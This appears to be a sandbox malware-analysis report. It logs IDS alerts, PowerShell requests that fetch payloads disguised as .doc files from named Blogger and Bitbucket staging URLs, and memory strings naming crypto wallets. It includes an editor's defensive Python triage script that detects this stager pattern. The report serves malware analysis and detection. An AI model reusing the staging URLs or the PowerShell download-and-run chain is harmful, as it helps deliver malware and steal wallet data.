                      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.30:49809 -> 23.192.229.107:443
                      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.30:49850 -> 23.192.229.107:443
                      Source: Network traffic | Suricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 185.208.159.170:2484 -> 192.168.11.30:49849
                      Source: Network traffic | Suricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 185.208.159.170:2484 -> 192.168.11.30:49834
                      Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.30:49808 -> 104.192.142.25:443
                      Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.30:49806 -> 74.125.138.132:443
                      Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.30:49807 -> 74.125.138.132:443
                      Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.30:49807 -> 74.125.138.132:443
                      Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.30:49821 -> 64.233.185.132:443
                      Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.30:49822 -> 64.233.185.132:443
                      Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.30:49822 -> 64.233.185.132:443
                      Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.30:49817 -> 64.233.185.132:443
                      Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.30:49817 -> 64.233.185.132:443
                      Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.30:49838 -> 64.233.185.132:443
                      Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.30:49842 -> 64.233.185.132:443
                      Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.30:49842 -> 64.233.185.132:443
                      Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.30:49815 -> 64.233.185.132:443
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe Code function: 52_2_6B9863A9 HttpQueryInfoW,InternetReadFile,InternetQueryDataAvailable,52_2_6B9863A9
                      Source: global traffic HTTP traffic detected: GET /lundchikha.doc HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 | Host: marchlkalanew6.blogspot.com | Connection: Keep-Alive
                      Source: global traffic HTTP traffic detected: GET /atom.xml HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 | Host: marchlkalanew6.blogspot.com
                      Source: global traffic HTTP traffic detected: GET /!api/2.0/snippets/ansidjaassdasmjkkkkk/Ed7Axy/674fe1eb1b772d5a8f6b913ad0a40c3c7a1d2410/files/file HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 | Host: bitbucket.org | Connection: Keep-Alive
                      Source: global traffic HTTP traffic detected: GET /chig.doc HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 | Host: kalacpamarchclean.blogspot.com | Connection: Keep-Alive
                      Source: global traffic HTTP traffic detected: GET /atom.xml HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 | Host: kalacpamarchclean.blogspot.com
                      Source: global traffic HTTP traffic detected: GET /chig.doc HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 | Host: kalacpamarchclean.blogspot.com | Connection: Keep-Alive
                      Source: global traffic HTTP traffic detected: GET /atom.xml HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 | Host: kalacpamarchclean.blogspot.com
                      Source: global traffic HTTP traffic detected: GET /chig.doc HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 | Host: kalacpamarchclean.blogspot.com | Connection: Keep-Alive
                      Source: global traffic HTTP traffic detected: GET /atom.xml HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 | Host: kalacpamarchclean.blogspot.com
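Every HTTP request above carries the default User-Agent that PowerShell's web cmdlets send ("... WindowsPowerShell/5.1.19041.1151"), and the targets are Blogger pages and a raw Bitbucket snippet serving a payload disguised as a .doc. That is the stager pattern the Suricata "Windows PowerShell HTTP activity" alerts fire on. The following triage script, added by the editor as an illustration and not Joe Sandbox code, parses raw request heads and scores that pattern. The three request blobs are constructed to mirror the report's GET lines (plus a browser control), and the staging-host list and finding names are this example's own assumptions.

```python
"""Triage raw HTTP request heads for the PowerShell stager pattern: the default
WindowsPowerShell/<version> User-Agent fetching a stage from blog or
code-snippet hosting. Added by the editor as an illustration, not Joe Sandbox
code. Requests are constructed to mirror the report; the staging-host list and
finding names are assumptions of this example."""
import re

PS_UA_RE = re.compile(r"\bWindowsPowerShell/(\d+\.\d+)")
# Free hosting commonly abused to stage payloads (assumed list for this example).
STAGING_HOSTS = ("blogspot.com", "bitbucket.org", "pastebin.com")
# Extensions that make a payload look like a document or image to a proxy.
CLOAK_EXTENSIONS = (".doc", ".docx", ".txt", ".xml", ".jpg", ".png")

PS_UA = "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151"
REQ_DOC = (
    "GET /lundchikha.doc HTTP/1.1\r\n"
    f"User-Agent: {PS_UA}\r\n"
    "Host: marchlkalanew6.blogspot.com\r\n"
    "Connection: Keep-Alive\r\n\r\n"
)
REQ_SNIPPET = (
    "GET /!api/2.0/snippets/ansidjaassdasmjkkkkk/Ed7Axy/"
    "674fe1eb1b772d5a8f6b913ad0a40c3c7a1d2410/files/file HTTP/1.1\r\n"
    f"User-Agent: {PS_UA}\r\n"
    "Host: bitbucket.org\r\n"
    "Connection: Keep-Alive\r\n\r\n"
)
# Control (constructed): a browser reading a blog feed must not count as a stager.
REQ_BENIGN = (
    "GET /atom.xml HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/123.0 Safari/537.36\r\n"
    "Host: someblog.blogspot.com\r\n\r\n"
)


def parse_request(raw):
    """Split an HTTP/1.1 request head into method, target, version and
    lower-cased header names; any body after the blank line is ignored."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _sep, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers}


def on_staging_host(host):
    """Exact or subdomain match against the assumed staging-host list."""
    return any(host == s or host.endswith("." + s) for s in STAGING_HOSTS)


def triage_request(raw):
    """Return the list of findings for one request, in a fixed order."""
    req = parse_request(raw)
    host = req["headers"].get("host", "").lower()
    ua = req["headers"].get("user-agent", "")
    path = req["target"].split("?", 1)[0].lower()
    findings = []
    ps = PS_UA_RE.search(ua)
    if ps:
        # Invoke-WebRequest / WebClient default UA: a script, not a browser.
        findings.append("powershell-client:" + ps.group(1))
    if on_staging_host(host):
        findings.append("staging-host")
    if host == "bitbucket.org" and "/!api/2.0/snippets/" in path:
        findings.append("raw-snippet-download")
    if ps and path.endswith(CLOAK_EXTENSIONS):
        # PowerShell does not open documents: the "document" is a payload.
        findings.append("scripted-document-fetch")
    return findings


def is_stager(findings):
    """PowerShell as the client plus a staging host is the stager pattern."""
    return any(f.startswith("powershell-client") for f in findings) and (
        "staging-host" in findings or "raw-snippet-download" in findings
    )


if __name__ == "__main__":
    for name, raw in (("doc", REQ_DOC), ("snippet", REQ_SNIPPET), ("benign", REQ_BENIGN)):
        f = triage_request(raw)
        print(f"{name:8} stager={is_stager(f)} findings={f}")
```

The control request shows why the host alone is not a verdict: a blogspot.com feed fetched by a browser gets "staging-host" and nothing else. The User-Agent is the cheap part to change, so treat the version string as a pivot for hunting, not as the only trigger.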
                      Source: global traffic DNS traffic detected: DNS query: api.msn.com
                      Source: global traffic DNS traffic detected: DNS query: marchlkalanew6.blogspot.com
                      Source: global traffic DNS traffic detected: DNS query: bitbucket.org
                      Source: global traffic DNS traffic detected: DNS query: assets.msn.com
                      Source: global traffic DNS traffic detected: DNS query: kalacpamarchclean.blogspot.com
                      Source: global traffic DNS traffic detected: DNS query: time.cloudflare.com
                      Source: global traffic DNS traffic detected: DNS query: ts1.aco.net
                      Source: global traffic DNS traffic detected: DNS query: ntp.time.nl
                      Source: global traffic DNS traffic detected: DNS query: x.ns.gin.ntt.net
                      Source: global traffic DNS traffic detected: DNS query: ntp.nict.jp
                      Source: global traffic DNS traffic detected: DNS query: ntp1.hetzner.de
                      Source: global traffic DNS traffic detected: DNS query: ntp1.net.berkeley.edu
                      Source: global traffic DNS traffic detected: DNS query: chrome.cloudflare-dns.com
                      Source: global traffic TCP traffic: 192.168.11.30:50583 -> 239.255.255.250:1900
                      Source: chrome.exe, 00000023.00000002.289689419024.000060C400C04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1/
                      Source: chrome.exe, 00000023.00000002.289689419024.000060C400C04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1/?
                      Source: wmlaunch.exe, 00000032.00000003.289889364016.0000023018422000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:%u/json/list?t=%u
                      Source: wmlaunch.exe, 00000032.00000003.289889364016.0000023018422000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:%u/json/list?t=%u...
                      Source: wmlaunch.exe, 00000032.00000003.289889364016.0000023018422000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:%u/json/list?t=%uws:exodus.jsExodusatomic.jsAtomicguarda.jsGuardainfinity.jsInfinit
                      Source: chrome.exe, 00000023.00000002.289677540287.000060C400130000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:8000/
                      Source: chrome.exe, 00000023.00000002.289692197987.000060C400E24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289692487296.000060C400ECC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289671770639.00002C680002C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289690506994.000060C400CB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289673402512.000036D00002C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289687075514.000060C4009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289691648497.000060C400DD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289675377334.000060C0000ED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289678597125.000060C400204000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:8000/92db0035/42bc8076
                      Source: chrome.exe, 00000023.00000002.289690589537.000060C400CD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289678241077.000060C4001BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289687075514.000060C4009D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:8000/92db0035/42bc80760(p
                      Source: chrome.exe, 00000023.00000002.289673402512.000036D00002C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:8000/92db0035/42bc80766
                      Source: svchost.exe, 0000001B.00000003.289716219780.0000018CD5639000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289716219780.0000018CD562F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289750972128.0000018CD5D02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289740415298.0000018CD560A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:8000/92db0035/b0766183
                      Source: powershell.exe, 00000016.00000002.289540073156.0000022B3F429000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.289697426953.000002AA3C292000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchrss/1.0/
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmp Strings found in binary or memory (ANGLE bug-tracker references embedded in chrome.exe): http://anglebug.com/1423136, http://anglebug.com/342316794, http://anglebug.com/345244067, http://anglebug.com/40096464, http://anglebug.com/40096643, http://anglebug.com/40096838, http://anglebug.com/40644663, http://anglebug.com/40644740, http://anglebug.com/40644747, http://anglebug.com/40644776, http://anglebug.com/40644912, http://anglebug.com/41488637, http://anglebug.com/41493495, http://anglebug.com/42261226, http://anglebug.com/42261756, http://anglebug.com/42261881, http://anglebug.com/42261882, http://anglebug.com/42262115, http://anglebug.com/42262161, http://anglebug.com/42262166, http://anglebug.com/42262239, http://anglebug.com/42262247, http://anglebug.com/42262249, http://anglebug.com/42262258, http://anglebug.com/42262476, http://anglebug.com/42262506, http://anglebug.com/42262605, http://anglebug.com/42262955, http://anglebug.com/42263010, http://anglebug.com/42263031, http://anglebug.com/42263049, http://anglebug.com/42263158, http://anglebug.com/42263239, http://anglebug.com/42263322, http://anglebug.com/42263477, http://anglebug.com/42263580, http://anglebug.com/42263622, http://anglebug.com/42263629, http://anglebug.com/42263911, http://anglebug.com/42263914, http://anglebug.com/42263960, http://anglebug.com/42263969, http://anglebug.com/42264071, http://anglebug.com/42264193, http://anglebug.com/42264287, http://anglebug.com/42264422
                      Source: chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmp Strings found in binary or memory: http://anglebug.com/40096601, http://anglebug.com/42262286, http://anglebug.com/42262287
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42264443
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42264446
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42264571
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42264577
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42264669
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42264767
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42264951
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42265147
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42265186
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42265248
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42265353
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42265369
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42265370
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42265407
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42265429
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42265509
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42265516
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42265647
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42265841
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42265878
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42265957
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42266019
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42266021
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42266024
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42266194
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42266231
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42266232
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42266602
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42266652
